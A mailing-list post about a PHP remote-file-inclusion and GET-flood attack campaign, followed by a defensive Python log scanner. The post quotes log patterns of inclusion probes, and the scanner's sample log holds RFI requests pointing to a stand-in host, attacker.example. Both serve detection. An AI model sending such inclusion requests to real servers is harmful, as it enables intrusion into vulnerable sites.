I have been asked to provide updates to the list when/if I made any progress on this.

I have. I'm not sure what to do next, however, or whether the finding should be put out fully. I don't know, as I have never done that before.

But the attack keeps growing and is now reaching 300,000 logged source IPs. I found a way to work around it, and I was also able to find a variation on the theme of how this gets propagated anyway.

I also just traced back a new one that just started and is attacking many sites and spreading using a possible hole in MyPHPAdmin. This new one pretends to be from the new Windows OS using the new upcoming Firefox/1.6. I didn't find a way to stop it from attacking; however, it can't inject itself in, as for this your PHP code obviously needs to allow it, and you need MyPHPAdmin or a variation of it installed, like this new one discovered just a few weeks ago:

http://www.securityfocus.com/bid/18763/info

All variations on that.

I have found a few sources of it: the code used to start it, the code to inject it, as well as the Perl code that will also run on the box to start the attack and propagate itself to others.

At this point I am not sure if I should do anything else with this or not. I am reluctant to post the full code, obviously, as this would promote the creation of many more variations of it, but at the same time I feel it should be known so that users can do something to protect themselves and others.

But let me say that should you have MyPHPAdmin installed, or others like it, maybe you should check your logs and look for things like:

/Include/lib.inc.php3?Include=http://www.xxx.xx/xxxx/xxxxxxxxx_c/remote.txt

or

/Include/Header.Inc.PHP?Include=http://www.xxx.xx/xxxx/xxxxxxxxx_c/remote.txt

or variations on that, to be sure you didn't have anyone get into your system via badly written PHP code if you didn't do sanity checks on user-passed variables, or worse, via installed bad libraries of some packages.

So, some of it is already an old version that existed in 2000, but it looks like there is a new recurring variation of it coming out.

As to how to work around the issue: well, it's not that you can stop it, but you definitely can minimize the impact of it with the understanding that the offending party will attack you with GETs to your site, trying to inject itself into you. But if it can't do this, then it will simply, with a different variation, try to flood your site via GETs.

However, it's possible to minimize that too. Again, I can make the how-to public, but at the same time it will tell how to increase the effect of the attack, as it's possible to make it much more efficient, and what I came up with as a defense for it would be useless. So, again, I am not sure how to address or offer the suggestion I put in place with success so far. I have been running it really well for almost three weeks now without any problem or impact to the sites.

Again, what should I do? In the end there is no magic to it and it's really simple, but working around it is really simple too.

Also, in this version, the use of Google and AltaVista doesn't help.

I don't think the idea of this type of attack is new at all, but obviously there are new holes now, as very new variations are coming out quickly, and they all pretend to be from very new OSes and browsers as well.

So, any suggestions as to what should be done next are very welcome as well, if anything.

I am obviously in very green territory here.

Best,

Daniel

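One way to run the log check described in the post above, as an added example that is not part of the original message or of any project it mentions: a Python script that parses combined-format access-log lines, flags any query parameter whose value is a remote URL (the `?Include=http://.../remote.txt` pattern quoted above, including its URL-encoded form), and counts GETs per source IP so that the flood variant the post describes also stands out. The log lines, hostnames, IP addresses and the threshold of 50 GETs are constructed for the example; real logs would be read from the web server's access log instead.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format:
# host ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# URL schemes that a PHP include() with remote URLs allowed will fetch and execute.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_candidates(entry):
    """Yield (param, value) pairs whose value is a remote URL, i.e. a remote-file-inclusion
    probe such as ?Include=http://.../remote.txt.  parse_qsl percent-decodes values, so the
    encoded form http%3A%2F%2F... is caught as well."""
    query = urlsplit(entry["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            yield name, value


def scan(lines, flood_threshold=50):
    """Scan access-log lines.  Returns (rfi_hits, flooders):
      rfi_hits  - list of (ip, path, param, remote_url) for every RFI-style request
      flooders  - dict ip -> GET count for IPs at or above flood_threshold GETs
    """
    rfi_hits = []
    gets = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if entry["method"] == "GET":
            gets[entry["ip"]] += 1
        path = urlsplit(entry["target"]).path
        for param, url in rfi_candidates(entry):
            rfi_hits.append((entry["ip"], path, param, url))
    flooders = {ip: n for ip, n in gets.items() if n >= flood_threshold}
    return rfi_hits, flooders


def build_sample_log():
    """Constructed sample log (hostnames and IPs are documentation/test addresses, not real)."""
    lines = [
        '198.51.100.7 - - [01/Jan/2000:00:00:01 +0000] "GET /Include/lib.inc.php3'
        '?Include=http://attacker.example/remote.txt HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
        '198.51.100.7 - - [01/Jan/2000:00:00:02 +0000] "GET /Include/Header.Inc.PHP'
        '?Include=http%3A%2F%2Fattacker.example%2Fremote.txt HTTP/1.0" 404 210 "-" "Mozilla/5.0"',
        '203.0.113.9 - - [01/Jan/2000:00:00:03 +0000] "GET /index.php?page=home HTTP/1.1" '
        '200 3021 "-" "Mozilla/5.0"',
    ]
    # One source hammering the same page with plain GETs: the flood variant.
    for i in range(60):
        lines.append(
            f'192.0.2.5 - - [01/Jan/2000:00:01:{i % 60:02d} +0000] '
            f'"GET /index.php?page=home HTTP/1.0" 200 3021 "-" "Mozilla/5.0"'
        )
    return lines


if __name__ == "__main__":
    hits, flooders = scan(build_sample_log())
    for ip, path, param, url in hits:
        print(f"RFI attempt from {ip}: {path} param {param!r} -> {url}")
    for ip, n in flooders.items():
        print(f"possible GET flood from {ip}: {n} requests")
```

Against a live server, feed `scan()` the lines of the access log (for example `open("/var/log/apache2/access.log")`), and treat any hit whose status is 200 as a request that reached a script, which is the case worth investigating further. The flood threshold is arbitrary here; pick one from the normal per-client request rate of the site.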